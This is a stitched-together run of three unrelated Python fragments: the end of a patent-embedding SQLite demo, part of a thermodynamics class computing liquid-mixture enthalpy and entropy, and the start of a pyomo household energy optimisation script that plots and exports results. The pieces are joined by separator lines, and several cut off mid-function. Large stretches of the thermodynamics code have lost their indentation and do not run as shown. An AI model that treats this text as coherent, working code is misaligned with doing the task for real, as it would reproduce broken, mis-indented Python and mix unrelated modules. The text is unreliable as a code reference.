    as bytes (the matrix file is opened in binary mode).
    """
    patent_names = map(lambda x: x[0], records)
    patent_names = filter(None, patent_names)
    patent_names = "\n".join(patent_names)
    document_embeddings = map(lambda x: x[1], records)
    document_embeddings = filter(None, document_embeddings)
    document_embeddings = "\n".join(document_embeddings)
    if not DISABLE_PATENT_CATEGORIES:
        patent_categories = map(lambda x: x[2], records)
        patent_categories = filter(None, patent_categories)
        patent_categories = "\n".join(patent_categories)
    # only write when the clustering output directory exists
    if os.path.exists(PATENT_CLUSTERING_PATH):
        if patent_names:
            FileHandler.write(patent_names+"\n", LABELS, "a")
        if document_embeddings:
            # embeddings file is binary ("ab"): encode the joined text block
            FileHandler.write(document_embeddings.encode()+b"\n",
                              PATENT_MATRIX,
                              "ab")
        if (not DISABLE_PATENT_CATEGORIES and patent_categories):
            FileHandler.write(patent_categories+"\n", CLASSES, "a")
if __name__ == '__main__':
    # Demo / smoke test: build a database of zero-vector embeddings, dump it
    # to disk, reload it, and time a lookup.
    # Database: write operations
    db = Database(verbose=True)
    db.connect(in_memory=True)
    db.create_table(table=PATENT_EMBEDDING_TABLE,
                    primary_column=PRIMARY_KEY,
                    other_columns=FIELDS)
    total_records = 1000
    dimension = 500
    for i in range(total_records):
        # each record stores a zero vector as a space-separated string
        default_embedding = np.zeros((dimension,), dtype=np.float32)
        document_embedding = " ".join(map(str, default_embedding))
        record = [("PatentName", str(i)),
                  ("DocumentEmbedding", document_embedding),
                  ("PatentCategory", "UNKNOWN")]
        db.insert(table=PATENT_EMBEDDING_TABLE, record=record)
    db.create_index(index=PATENT_EMBEDDING_INDEX,
                    table=PATENT_EMBEDDING_TABLE,
                    index_by_column=PRIMARY_KEY[0])
    db.get_total_records(PATENT_EMBEDDING_TABLE)
    db.get_table_schema(PATENT_EMBEDDING_TABLE)
    # dump the in-memory database to disk as an SQL script
    db.close(save_to=PATENT_EMBEDDING_DATABASE)
    # Database: read operations
    db = Database(verbose=True)
    db.connect(in_memory=True, load_from=PATENT_EMBEDDING_DATABASE)
    total_patents = 50
    patents = [str(i+5) for i in range(total_patents)]
    dimension = 500
    try:
        # write the word2vec-style "<count> <dim>" header line
        # NOTE(review): bytes %-formatting requires Python >= 3.5
        FileHandler.write((b"%d %d\n" % (total_patents, dimension)),
                          PATENT_MATRIX,
                          "ab")
    except IOError as e:
        # NOTE(review): the caught exception `e` is discarded here
        raise FileHandlerError()
    start_time = time.time()
    Lookup(db,
           table=PATENT_EMBEDDING_TABLE,
           index=PATENT_EMBEDDING_INDEX,
           search_on=PRIMARY_KEY[0],
           save=True,
           patents=patents)
# | |
= 1/PropsSI('DMOLAR', 'T', T, 'Q', 0, fluid)
Vm2 = 1/PropsSI('DMOLAR', 'T', T, 'P', P2, fluid)
dH = PropsSI('HMOLAR', 'T', T, 'P', P2, fluid) - PropsSI('HMOLAR', 'T', T, 'Q', 0, fluid)
def to_int(P):
Vm = 1/PropsSI('DMOLAR', 'T', T, 'P', P, fluid)
alpha = PropsSI('ISOBARIC_EXPANSION_COEFFICIENT', 'T', T, 'P', P, fluid)
return Vm -alpha*T*Vm
quad(to_int, Psat, P2, epsabs=1.49e-14, epsrel=1.49e-14)[0]/dH
'''
if self.use_IG_Cp:
try:
Psats = self._Psats
except AttributeError:
Psats = self.Psats()
try:
dPsats_dT = self._dPsats_dT
except AttributeError:
dPsats_dT = self.dPsats_dT()
try:
Vms_sat = self._Vms_sat
except AttributeError:
Vms_sat = self.Vms_sat()
try:
dVms_sat_dT = self._Vms_sat_dT
except AttributeError:
dVms_sat_dT = self.dVms_sat_dT()
failed_dPsat_dT = False
try:
H = 0.0
for i in cmps:
dV_vap = R*T/Psats[i] - Vms_sat[i]
# print( R*T/Psats[i] , Vms_sat[i])
# ratio of der to value might be easier?
dS_vap = dPsats_dT[i]*dV_vap
# print(dPsats_dT[i]*dV_vap)
Hvap = T*dS_vap
H += zs[i]*(Cpig_integrals_pure[i] - Hvap)
except ZeroDivisionError:
failed_dPsat_dT = True
if failed_dPsat_dT or isinf(H):
# Handle the case where vapor pressure reaches zero - needs special implementations
dPsats_dT_over_Psats = self.dPsats_dT_over_Psats()
H = 0.0
for i in cmps:
# dV_vap = R*T/Psats[i] - Vms_sat[i]
# dS_vap = dPsats_dT[i]*dV_vap
Hvap = T*dPsats_dT_over_Psats[i]*RT
H += zs[i]*(Cpig_integrals_pure[i] - Hvap)
if self.use_Tait:
dH_dP_integrals_Tait = self.dH_dP_integrals_Tait()
for i in cmps:
H += zs[i]*dH_dP_integrals_Tait[i]
elif self.use_Poynting:
for i in cmps:
# This bit is the differential with respect to pressure
# dP = max(0.0, P - Psats[i]) # Breaks thermodynamic consistency
dP = P - Psats[i]
H += zs[i]*dP*(Vms_sat[i] - T*dVms_sat_dT[i])
else:
Psats = self.Psats()
Vms_sat = self.Vms_sat()
dVms_sat_dT = self.dVms_sat_dT()
dPsats_dT = self.dPsats_dT()
Hvaps_T_ref = self.Hvaps_T_ref()
Cpl_integrals_pure = self._Cpl_integrals_pure()
dVms_sat_dT_T_ref = self.dVms_sat_dT_T_ref()
Vms_sat_T_ref = self.Vms_sat_T_ref()
Psats_T_ref = self.Psats_T_ref()
Hvaps = self.Hvaps()
H = 0.0
for i in self.cmps:
H += zs[i]*(Cpl_integrals_pure[i] - Hvaps_T_ref[i]) #
# If we can use the liquid heat capacity and prove its consistency
# This bit is the differential with respect to pressure
dP = P - Psats_T_ref[i]
H += zs[i]*dP*(Vms_sat_T_ref[i] - T_REF_IG*dVms_sat_dT_T_ref[i])
else:
Hvaps = self.Hvaps()
for i in self.cmps:
H += zs[i]*(Cpig_integrals_pure[i] - Hvaps[i])
H += self.GibbsExcessModel.HE()
# self._H = H
return H
def H(self):
try:
return self._H
except AttributeError:
pass
T = self.T
nRT2 = -R*T*T
zs, cmps = self.zs, self.cmps
try:
Cpig_integrals_pure = self._Cpig_integrals_pure
except AttributeError:
Cpig_integrals_pure = self.Cpig_integrals_pure()
# try:
# Psats = self._Psats
# except AttributeError:
# Psats = self.Psats()
# try:
# dPsats_dT = self._dPsats_dT
# except AttributeError:
# dPsats_dT = self.dPsats_dT()
dPsats_dT_over_Psats = self.dPsats_dT_over_Psats()
use_Poynting, use_phis_sat = self.use_Poynting, self.use_phis_sat
if use_Poynting:
try:
Poyntings = self._Poyntings
except AttributeError:
Poyntings = self.Poyntings()
try:
dPoyntings_dT = self._dPoyntings_dT
except AttributeError:
dPoyntings_dT = self.dPoyntings_dT()
if use_phis_sat:
try:
dphis_sat_dT = self._dphis_sat_dT
except AttributeError:
dphis_sat_dT = self.dphis_sat_dT()
try:
phis_sat = self._phis_sat
except AttributeError:
phis_sat = self.phis_sat()
H = 0.0
if use_Poynting and use_phis_sat:
for i in cmps:
H += zs[i]*(nRT2*(dphis_sat_dT[i]/phis_sat[i] + dPsats_dT_over_Psats[i] + dPoyntings_dT[i]/Poyntings[i])
+ Cpig_integrals_pure[i])
elif use_Poynting:
for i in cmps:
H += zs[i]*(nRT2*(dPsats_dT_over_Psats[i] + dPoyntings_dT[i]/Poyntings[i]) + Cpig_integrals_pure[i])
elif use_phis_sat:
for i in cmps:
H += zs[i]*(nRT2*(dPsats_dT_over_Psats[i] + dphis_sat_dT[i]/phis_sat[i]) + Cpig_integrals_pure[i])
else:
for i in cmps:
H += zs[i]*(nRT2*dPsats_dT_over_Psats[i] + Cpig_integrals_pure[i])
if not self.composition_independent:
H += self.GibbsExcessModel.HE()
self._H = H
return H
    def S_old(self):
        # Legacy molar entropy [J/(mol*K)] calculation; superseded by S()
        # below but kept for reference. NOTE(review): does not cache to
        # self._S (the caching code is commented out) -- confirm intended.
        # try:
        #     return self._S
        # except AttributeError:
        #     pass
        # Untested
        # Page 650 Chemical Thermodynamics for Process Simulation
        '''
        from scipy.integrate import *
        from CoolProp.CoolProp import PropsSI
        fluid = 'decane'
        T = 400
        Psat = PropsSI('P', 'T', T, 'Q', 0, fluid)
        P2 = Psat*100
        dP = P2 - Psat
        Vm = 1/PropsSI('DMOLAR', 'T', T, 'Q', 0, fluid)
        Vm2 = 1/PropsSI('DMOLAR', 'T', T, 'P', P2, fluid)
        dH = PropsSI('HMOLAR', 'T', T, 'P', P2, fluid) - PropsSI('HMOLAR', 'T', T, 'Q', 0, fluid)
        dS = PropsSI('SMOLAR', 'T', T, 'P', P2, fluid) - PropsSI('SMOLAR', 'T', T, 'Q', 0, fluid)
        def to_int2(P):
            Vm = 1/PropsSI('DMOLAR', 'T', T, 'P', P, fluid)
            alpha = PropsSI('ISOBARIC_EXPANSION_COEFFICIENT', 'T', T, 'P', P, fluid)
            return -alpha*Vm
        quad(to_int2, Psat, P2, epsabs=1.49e-14, epsrel=1.49e-14)[0]/dS
        '''
        # Ideal mixing entropy: -R*sum(z_i*ln(z_i)).
        S = 0.0
        T, P, zs, cmps = self.T, self.P, self.zs, self.cmps
        log_zs = self.log_zs()
        for i in cmps:
            S -= zs[i]*log_zs[i]
        S *= R
        # Saved so the dPsat/dT-failure fallback path can restart from here.
        S_base = S
        T_inv = 1.0/T
        RT = R*T
        P_REF_IG_INV = self.P_REF_IG_INV
        # Pull cached per-component property lists when available (EAFP).
        try:
            Cpig_integrals_over_T_pure = self._Cpig_integrals_over_T_pure
        except AttributeError:
            Cpig_integrals_over_T_pure = self.Cpig_integrals_over_T_pure()
        try:
            Psats = self._Psats
        except AttributeError:
            Psats = self.Psats()
        try:
            dPsats_dT = self._dPsats_dT
        except AttributeError:
            dPsats_dT = self.dPsats_dT()
        try:
            Vms_sat = self._Vms_sat
        except AttributeError:
            Vms_sat = self.Vms_sat()
        try:
            dVms_sat_dT = self._Vms_sat_dT
        except AttributeError:
            dVms_sat_dT = self.dVms_sat_dT()
        if self.P_DEPENDENT_H_LIQ:
            if self.use_IG_Cp:
                # Primary path: ideal-gas Cp integrals plus a Clapeyron-style
                # vaporization entropy from dPsat/dT.
                failed_dPsat_dT = False
                try:
                    for i in self.cmps:
                        dSi = Cpig_integrals_over_T_pure[i]
                        dVsat = R*T/Psats[i] - Vms_sat[i]
                        dSvap = dPsats_dT[i]*dVsat
                        # dSvap = Hvaps[i]/T # Confirmed - this line breaks everything - do not use
                        dSi -= dSvap
                        # dSi = Cpig_integrals_over_T_pure[i] - Hvaps[i]*T_inv # Do the transition at the temperature of the liquid
                        # Take each component to its reference state change - saturation pressure
                        # dSi -= R*log(P*P_REF_IG_INV)
                        dSi -= R*log(Psats[i]*P_REF_IG_INV)
                        # dSi -= R*log(P/101325.0)
                        # Only include the
                        dP = P - Psats[i]
                        # dP = max(0.0, P - Psats[i])
                        # if dP > 0.0:
                        # I believe should include effect of pressure on all components, regardless of phase
                        dSi -= dP*dVms_sat_dT[i]
                        S += dSi*zs[i]
                except (ZeroDivisionError, ValueError):
                    # Handle the zero division on Psat or the log getting too small
                    failed_dPsat_dT = True
                if failed_dPsat_dT or isinf(S):
                    # Fallback path for Psat -> 0: restart from the ideal
                    # mixing term and use ln(Psat) based quantities directly.
                    S = S_base
                    # Handle the case where vapor pressure reaches zero - needs special implementations
                    dPsats_dT_over_Psats = self.dPsats_dT_over_Psats()
                    lnPsats = self.lnPsats()
                    LOG_P_REF_IG = self.LOG_P_REF_IG
                    for i in cmps:
                        dSi = Cpig_integrals_over_T_pure[i]
                        dSvap = RT*dPsats_dT_over_Psats[i]
                        dSi -= dSvap
                        dSi -= R*(lnPsats[i] - LOG_P_REF_IG)# trunc_log(Psats[i]*P_REF_IG_INV)
                        dSi -= P*dVms_sat_dT[i]
                        S += dSi*zs[i]
                # NOTE(review): the Tait/Poynting pressure corrections are
                # unimplemented placeholders in this legacy path.
                if self.use_Tait:
                    pass
                elif self.use_Poynting:
                    pass
                    # for i in cmps:
            else:
                # Liquid-Cp path: integrate liquid heat capacity from the
                # reference temperature and vaporize at T_REF_IG instead.
                # mine
                Hvaps_T_ref = self.Hvaps_T_ref()
                Psats_T_ref = self.Psats_T_ref()
                Cpl_integrals_over_T_pure = self._Cpl_integrals_over_T_pure()
                T_REF_IG_INV = self.T_REF_IG_INV
                dVms_sat_dT_T_ref = self.dVms_sat_dT_T_ref()
                Vms_sat_T_ref = self.Vms_sat_T_ref()
                for i in self.cmps:
                    dSi = Cpl_integrals_over_T_pure[i]
                    dSi -= Hvaps_T_ref[i]*T_REF_IG_INV
                    # Take each component to its reference state change - saturation pressure
                    dSi -= R*log(Psats_T_ref[i]*P_REF_IG_INV)
                    # I believe should include effect of pressure on all components, regardless of phase
                    dP = P - Psats_T_ref[i]
                    dSi -= dP*dVms_sat_dT_T_ref[i]
                    S += dSi*zs[i]
            # else:
            #     # COCO
            #     Hvaps = self.Hvaps()
            #     Psats_T_ref = self.Psats_T_ref()
            #     _Cpl_integrals_over_T_pure = self._Cpl_integrals_over_T_pure()
            #     T_REF_IG_INV = self.T_REF_IG_INV
            #
            #     for i in self.cmps:
            #         dSi = -_Cpl_integrals_over_T_pure[i]
            #         dSi -= Hvaps[i]/T
            #         # Take each component to its reference state change - saturation pressure
            #         dSi -= R*log(Psats[i]*P_REF_IG_INV)
            #
            #         dP = P - Psats[i]
            #         # I believe should include effect of pressure on all components, regardless of phase
            #         dSi -= dP*dVms_sat_dT[i]
            #         S += dSi*zs[i]
        else:
            # Pressure-independent liquid: vaporization entropy at T only.
            Hvaps = self.Hvaps()
            for i in cmps:
                Sg298_to_T = Cpig_integrals_over_T_pure[i]
                Svap = -Hvaps[i]*T_inv # Do the transition at the temperature of the liquid
                S += zs[i]*(Sg298_to_T + Svap - R*log(P*P_REF_IG_INV)) #
        # self._S =
        # Excess entropy from the activity-coefficient model.
        S = S + self.GibbsExcessModel.SE()
        return S
def S(self):
try:
return self._S
except AttributeError:
pass
T, P = self.T, self.P
P_inv = 1.0/P
zs, cmps = self.zs, self.cmps
log_zs = self.log_zs()
S = 0.0
for i in cmps:
S -= zs[i]*log_zs[i]
S -= log(P*self.P_REF_IG_INV)
S *= R
try:
Cpig_integrals_over_T_pure = self._Cpig_integrals_over_T_pure
except AttributeError:
Cpig_integrals_over_T_pure = self.Cpig_integrals_over_T_pure()
try:
lnPsats = self._lnPsats
except AttributeError:
lnPsats = self.lnPsats()
dPsats_dT_over_Psats = self.dPsats_dT_over_Psats()
use_Poynting, use_phis_sat = self.use_Poynting, self.use_phis_sat
if use_Poynting:
try:
Poyntings = self._Poyntings
except AttributeError:
Poyntings = self.Poyntings()
try:
dPoyntings_dT = self._dPoyntings_dT
except AttributeError:
dPoyntings_dT = self.dPoyntings_dT()
if use_phis_sat:
try:
dphis_sat_dT = self._dphis_sat_dT
except AttributeError:
dphis_sat_dT = self.dphis_sat_dT()
try:
phis_sat = self._phis_sat
except AttributeError:
phis_sat = self.phis_sat()
if use_Poynting and use_phis_sat:
for i in cmps:
S -= zs[i]*(R*(T*(dphis_sat_dT[i]/phis_sat[i] + dPsats_dT_over_Psats[i] + dPoyntings_dT[i]/Poyntings[i])
+ lnPsats[i] + log(Poyntings[i]*phis_sat[i]*P_inv)) - Cpig_integrals_over_T_pure[i])
elif use_Poynting:
for i in cmps:
S -= zs[i]*(R*(T*(dPsats_dT_over_Psats[i] + dPoyntings_dT[i]/Poyntings[i])
+ lnPsats[i] + log(Poyntings[i]*P_inv)) - Cpig_integrals_over_T_pure[i])
elif use_phis_sat:
for i in cmps:
S -= zs[i]*(R*(T*(dphis_sat_dT[i]/phis_sat[i] + dPsats_dT_over_Psats[i])
+ lnPsats[i] + log(phis_sat[i]*P_inv)) - Cpig_integrals_over_T_pure[i])
else:
logP_inv = log(P_inv)
for i in cmps:
S -= zs[i]*(R*(T*dPsats_dT_over_Psats[i] + lnPsats[i] + logP_inv)
- Cpig_integrals_over_T_pure[i])
if not self.composition_independent:
S += self.GibbsExcessModel.SE()
self._S = S
return S
def Cp_old(self):
try:
return self._Cp
except AttributeError:
pass
# Needs testing
T, P, P_DEPENDENT_H_LIQ | |
<filename>ems/optim/opt_test.py<gh_stars>0
# -*- coding: utf-8 -*-
"""
Optimization for unit commitment of the household devices.
@author: ge57vam
"""
import sys
import pyomo.core as pyen
# import pyomo.environ
# from pyomo.core import *
from pyomo.opt import SolverFactory
from pyomo.opt import SolverManagerFactory
import pandas as pd
import numpy as np
import pyomo.core as py
import os
from scipy.interpolate import UnivariateSpline
import time as tm
from pyomo.environ import *
import matplotlib.pyplot as plt
import scipy.io
from ems.ems_mod import ems as ems_loc
def run_hp_opt(ems_local, plot_fig=True, result_folder='C:'):
    """Solve the household unit-commitment problem and post-process results.

    Builds and solves the pyomo model via ``run_hp``, extracts all device
    time series from the solved model, optionally plots the electricity and
    heat balances plus storage SOC curves, and writes an Excel report and a
    MATLAB .mat dump.

    :param ems_local: ems dict with device parameters and forecast data.
    :param plot_fig: if True, show the balance and SOC matplotlib figures.
    :param result_folder: directory for the xlsx report.
        NOTE(review): default 'C:' is a Windows drive root, probably not a
        writable directory on most systems -- confirm intended default.
    :return: dict of the extracted result time series (also written to xlsx).
    """
    # input_file = 'C:\Optimierung\Eingangsdaten_hp.xlsx'
    # data = read_xlsdata(input_file);
    prob, timesteps = run_hp(ems_local)
    length = len(timesteps)
    print('Load Results ...\n')
    # electricity variable
    HP_ele_cap, HP_ele_run, elec_import, elec_export, lastprofil_elec, ev_pow, CHP_cap, pv_power, bat_cont, bat_power, bat_power_pos, bat_power_neg = \
        (np.zeros(length) for i in range(12));
    # heat variable
    boiler_cap, CHP_heat_cap, HP_heat_run, HP_heat_cap, CHP_op, HP_operation, lastprofil_heat, sto_e_pow, sto_e_pow_pos, sto_e_pow_neg, sto_e_cont = \
        (np.zeros(length) for i in range(11));
    # final cost
    cost_min = np.zeros(length)
    # heat balance
    bat_max_cont = value(prob.bat_cont_max)
    sto_cont_max = value(prob.sto_cont)
    # NOTE(review): the two *_init values below are computed but never used
    # in this function -- confirm whether they belong elsewhere.
    bat_cont_init = bat_max_cont * 0.5
    sto_cont_init = sto_cont_max * 0.5
    i = 0
    # timesteps = sorted(get_entity(prob, 't').index)
    # demand, ext, pro, sto = get_timeseries(prob, timesteps
    # Extract every solved variable value, one array slot per timestep.
    for idx in timesteps:
        # electricity balance
        ev_pow[i] = value(prob.ev_power[idx]) * value(prob.ev_max_pow);
        elec_import[i] = value(prob.elec_import[idx]);
        elec_export[i] = value(prob.elec_export[idx]);
        lastprofil_elec[i] = value(prob.lastprofil_elec[idx]);
        CHP_op[i] = value(prob.CHP_cap[idx]);
        CHP_cap[i] = value(prob.CHP_cap[idx] * prob.chp_elec_max_cap);
        pv_power[i] = value(prob.PV_cap[idx] * prob.pv_effic * prob.solar[idx]);
        bat_cont[i] = value(prob.bat_cont[idx]);
        bat_power[i] = value(prob.bat_pow[idx]);
        ##heat balance
        boiler_cap[i] = value(prob.boiler_cap[idx]);
        CHP_heat_cap[i] = value(prob.CHP_cap[idx] * prob.chp_elec_max_cap / prob.chp_elec_effic * prob.chp_ther_effic);
        # NOTE(review): multiplying and dividing by sto_max_cont looks like a
        # no-op wrapper around value(prob.hp_run[idx]) -- confirm.
        HP_operation[i] = value(prob.hp_run[idx] * prob.sto_max_cont) / value(prob.sto_max_cont)
        HP_heat_cap[i] = value(prob.hp_run[idx] * prob.hp_ther_pow[idx])
        HP_ele_cap[i] = value(prob.hp_run[idx] * prob.hp_ele_pow[idx])
        HP_heat_run[i] = value(prob.hp_ther_pow[idx])
        HP_ele_run[i] = value(prob.hp_ele_pow[idx])
        lastprofil_heat[i] = value(prob.lastprofil_heat[idx]);
        sto_e_pow[i] = value(prob.sto_e_pow[idx]);
        sto_e_cont[i] = value(prob.sto_e_cont[idx]);
        # the total cost
        cost_min[i] = value(prob.costs[idx]);
        i += 1;
    # State of charge in percent for heat storage and battery.
    SOC_heat = sto_e_cont / sto_cont_max * 100;
    SOC_elec = bat_cont / bat_max_cont * 100;
    # battery_power
    # Split the signed battery power into charge/discharge bar series
    # (sign flipped for plotting below the axis).
    for i in range(length):
        if bat_power[i] > 0:
            bat_power_neg[i] = -bat_power[i];
        else:
            bat_power_pos[i] = -bat_power[i];
    # heat storage power
    for i in range(length):
        if sto_e_pow[i] > 0:
            sto_e_pow_neg[i] = -sto_e_pow[i];
        else:
            sto_e_pow_pos[i] = -sto_e_pow[i];
    # plt.plot(c)
    # plt.plot(a)
    # plt.plot(b)
    # plt.plot(d)
    ### plot elec balance
    N = len(timesteps)
    ind = np.arange(N)  # the x locations for the groups
    width = 1  # the width of the bars: can also be len(x) sequence
    print('Results Loaded.')
    # plt.clf()
    # NOTE(review): COLOURS is defined but never used below -- confirm.
    COLOURS = {
        0: 'lightsteelblue',
        1: 'cornflowerblue',
        2: 'royalblue',
        3: 'lightgreen',
        4: 'salmon',
        5: 'mediumseagreen',
        6: 'orchid',
        7: 'burlywood',
        8: 'palegoldenrod',
        9: 'darkkhaki',
        10: 'lightskyblue',
        11: 'firebrick',
        12: 'blue',
        13: 'darkgreen'}
    # Figure 1: stacked electricity balance; Figure 2: battery SOC.
    if plot_fig is True:
        fig = plt.figure()
        ax1 = fig.add_subplot(111)
        p1 = plt.bar(ind, CHP_cap, width, bottom=bat_power_pos, color='skyblue')
        ax1.axhline(linewidth=2, color="black")
        p2 = plt.bar(ind, pv_power, width,
                     bottom=bat_power_pos + CHP_cap, color='wheat')
        p3 = plt.bar(ind, bat_power_pos, width, color='#ff5a60')
        p4 = plt.bar(ind, bat_power_neg, width, color='#ff5a60')
        p5 = plt.bar(ind, elec_import, width, bottom=bat_power_pos + CHP_cap + pv_power, color='#689eb8')
        p6 = plt.bar(ind, -elec_export, width, bottom=bat_power_neg, color='black')
        # p7 = plt.plot(ind, lastprofil_elec,linewidth=3,color='k')
        p7 = plt.step(ind, lastprofil_elec, linewidth=2, where='mid', color='k')
        p8 = plt.bar(ind, -ev_pow, width, bottom=bat_power_neg - elec_export, color='pink')
        p9 = plt.bar(ind, -HP_ele_cap, width, bottom=bat_power_neg - elec_export - ev_pow, color='#a79b94')
        plt.xlabel('time [h]', fontsize=25)
        plt.ylabel('power und ele. demand [kW]', fontsize=25)
        plt.title('electricity balance', fontsize=30)
        idx_plt = np.arange(0, len(timesteps), int(len(timesteps) / 5))
        plt.xticks(ind[idx_plt], timesteps[idx_plt])
        ax1.set_xlim(0, len(timesteps) - 1)
        # plt.yticks(np.arange(-10, 10, 2))
        plt.legend((p1[0], p2[0], p3[0], p5[0], p6[0], p7[0], p8[0], p9[0]),
                   ('CHP', 'PV', 'battery', 'import', 'export', 'ele. demand', 'EV charge', 'HP'), prop={'size': 20},
                   loc='lower left')
        fig1 = plt.figure()
        ax2 = plt.subplot()
        # p8 = plt.plot(ind, bat_cont/bat_max_cont*100,linewidth=1,color='red')
        p8 = plt.step(ind, SOC_elec, linewidth=1, color='red', where='mid')
        plt.xlabel('time [h]', fontsize=25)
        plt.ylabel('SOC [%]', fontsize=25)
        plt.title('SOC of Battery', fontsize=30)
        plt.xticks(ind[idx_plt], timesteps[idx_plt])
        ax2.set_xlim(0, len(timesteps) - 1)
        plt.show()
    # plot heat balance
    # Figure 3: stacked heat balance; Figure 4: heat-storage SOC.
    if plot_fig is True:
        fig = plt.figure()
        ax1 = fig.add_subplot(111)
        ax1.axhline(linewidth=2, color="black")
        p1 = plt.bar(ind, boiler_cap, width, bottom=sto_e_pow_pos, color='#689eb8')
        p2 = plt.bar(ind, CHP_heat_cap, width,
                     bottom=boiler_cap + sto_e_pow_pos, color='skyblue')
        p3 = plt.bar(ind, HP_heat_cap, width, bottom=boiler_cap + CHP_heat_cap + sto_e_pow_pos, color='#a79b94')
        p4 = plt.bar(ind, sto_e_pow_pos, width, color='#ff5a60')
        p5 = plt.bar(ind, sto_e_pow_neg, width, color='#ff5a60')
        p6 = plt.step(ind, lastprofil_heat, linewidth=2, where='mid', color='k')
        plt.xlabel('time [1/4 h]', fontsize=25)
        plt.ylabel('power and heat load [kW]', fontsize=25)
        plt.title('heat balance', fontsize=30)
        # NOTE(review): this xticks call is immediately overridden by the
        # xticks call two lines below -- looks like leftover debug code.
        plt.xticks([0, 24, 2, 2], fontsize=30)
        plt.yticks(fontsize=30)
        idx_plt = np.arange(0, len(timesteps), int(len(timesteps) / 5))
        plt.xticks(ind[idx_plt], timesteps[idx_plt])
        ax1.set_xlim(0, len(timesteps) - 1)
        # plt.yticks(np.arange(-10, 10, 2))
        plt.legend((p1[0], p2[0], p3[0], p4[0], p6[0]), ('boiler', 'CHP', 'HP', 'heat storage', 'heat demand'),
                   prop={'size': 20}, loc='lower left')
        fig1 = plt.figure()
        ax2 = plt.subplot()
        p7 = plt.step(ind, SOC_heat, linewidth=1, where='mid', color='red')
        plt.xlabel('time [h]', fontsize=25)
        plt.ylabel('SOC [%]', fontsize=25)
        plt.xticks(ind[idx_plt], timesteps[idx_plt])
        ax2.set_xlim(0, len(timesteps) - 1)
        plt.title('SOC of heat storage', fontsize=30)
        plt.show()
    # save the data
    from datetime import datetime
    print('Save Results to Reportfile...\n')
    # xx ="\\nas.ads.mwn.de\ge57vam\TUM-PC\Desktop\Unterlagen\result"
    # Create Name of Resultfile
    t0 = tm.time()
    # inputfilename = input_file
    now = datetime.now().strftime('%Y%m%dT%H%M')
    resultfile = os.path.join(result_folder, 'result-{}.xlsx'.format(now))
    writer = pd.ExcelWriter(resultfile)
    data_input = {'HP_operation': list(HP_operation), 'HP_heat_power': list(HP_heat_cap),
                  'HP_heat_run': list(HP_heat_run),
                  'HP_ele_run': list(HP_ele_run), 'CHP_operation': list(CHP_op), 'SOC_heat': list(SOC_heat),
                  'SOC_elec': list(SOC_elec),
                  'battery_SOC': list(bat_cont / bat_max_cont * 100), 'battery_power': list(bat_power),
                  'PV_power': list(pv_power),
                  'EV_power': list(ev_pow), 'min cost': list(cost_min)}
    df = pd.DataFrame(data=data_input)
    df.to_excel(writer, 'operation_plan', merge_cells=False)
    # NOTE(review): hardcoded absolute Windows path; the .mat export will
    # fail anywhere this directory does not exist -- confirm intended.
    scipy.io.savemat('C:\Optimierung\AAAAA.mat', {'struct1': df.to_dict("list")})
    writer.save()  # save
    print('Results Saved. time: ' + "{:.1f}".format(tm.time() - t0) + ' s\n')
    return data_input
def run_hp(ems_local):
# record the time
t0 = tm.time()
# get all the data from the external file
# my_ems1 = ems_loc(initialize=True, path='C:/Users/ge57vam/emsflex/ems/ems01_ems.txt')
my_ems1 = ems_local
devices = my_ems1['devices']
# read data from excel file
print('Data Read. time: ' + "{:.1f}".format(tm.time() - t0) + ' s\n')
print('Prepare Data ...\n')
t = tm.time()
# write in the time series from the data
df_time_series = ems_local['fcst']
time_series = pd.DataFrame.from_dict(df_time_series)
# time = time_series.index.values
print('Data Prepared. time: ' + "{:.1f}".format(tm.time() - t) + ' s\n')
# lastprofil =data['Lastprofil']
# source_import =data['import']
# source_export =data['export']
# system
# get the initial time step
#time_step_initial = parameter.loc['System']['value']
time_step_initial = 0
timesteps_all = np.arange(1, 96)
# timestep_1 = timesteps[0]
timesteps = timesteps_all[time_step_initial:96]
t_dn = 6
t_up = 6
timesteps_dn = timesteps[time_step_initial+1:96 - t_dn]
timesteps_up = timesteps[time_step_initial+1:96 - t_up]
# 15 min for every timestep/ timestep by one hour
# create the concrete model
p2e = 0.25
# create the model object m
m = pyen.ConcreteModel()
# heat storage
sto_param = devices['sto']
# storage_cap = sto_param['stocap']
tem_min_sto = sto_param['mintemp']
tem_max_sto = sto_param['maxtemp']
soc_init = sto_param['initSOC']
self_discharge = sto_param['self_discharge']
# unit in kWh
sto_cont = sto_param['stocap']
# boiler
boil_param = devices['boiler']
boil_cap = boil_param['maxpow']
boil_eff = boil_param['eta']
# EV, availability should be added
ev_param = devices['ev']
ev_max_power = ev_param['maxpow']
# CHP
chp_param = devices['chp']
chp_elec_eff = chp_param['eta'][0]
chp_ther_eff = chp_param['eta'][1]
chp_elec_cap = chp_param['maxpow']
# heat pump
hp_param = devices['hp']
hp_ther_cap = pd.DataFrame.from_dict(hp_param['maxpow'])
hp_cop = pd.DataFrame.from_dict(hp_param['COP'])
# PV
pv_param = devices['pv']
pv_peak_pow = pv_param['maxpow']
pv_eff = pv_param['eta']
# battery
bat_param = devices['bat']
bat_max_cont = bat_param['stocap']
bat_SOC_init = bat_param['initSOC']
bat_pow_max = bat_param['maxpow']
## create the parameter
print('Define Model ...\n')
#
m.t = pyen.Set(ordered=True, initialize=timesteps,
doc='Timesteps with zero')
# m.t_end = pyen.Set(initialize=timesteps,
# doc='Timesteps without zero')
m.t_DN = pyen.Set(ordered=True, initialize=timesteps_dn,
doc='Timesteps without zero')
m.t_UP = pyen.Set(ordered=True, initialize=timesteps_up,
doc='Timesteps without zero')
# heat_storage
m.sto_max_cont = pyen.Param(initialize=sto_cont,
doc='No Partload: offset is zero')
m.SOC_init = pyen.Param(initialize=soc_init,
doc='No Partload: offset is zero')
# battery
m.bat_cont_max = pyen.Param(initialize=bat_max_cont)
m.bat_SOC_init = pyen.Param(initialize=bat_SOC_init)
m.bat_power_max = pyen.Param(initialize=bat_pow_max)
# hp
m.hp_ther_pow = pyen.Param(m.t, initialize=1, mutable=True, within=pyen.NonNegativeReals,
doc='No Partload: offset is zero')
m.sto_cont = pyen.Param(initialize=sto_cont,
doc='No Partload: offset is zero')
m.hp_COP = pyen.Param(m.t, initialize=1, mutable=True, within=pyen.NonNegativeReals,
doc='No Partload: offset is zero')
m.hp_ele_pow = pyen.Param(m.t, initialize=1, mutable=True, within=pyen.NonNegativeReals,
doc='No Partload: offset is zero')
m.T_DN = pyen.Param(initialize=t_dn, mutable=True,
doc='No Partload: offset is zero')
m.T_UP = pyen.Param(initialize=t_up, mutable=True,
doc='No Partload: offset is zero')
# elec_vehicle
m.ev_max_pow = pyen.Param(initialize=ev_max_power,
doc='No Partload: offset is zero')
# boilder
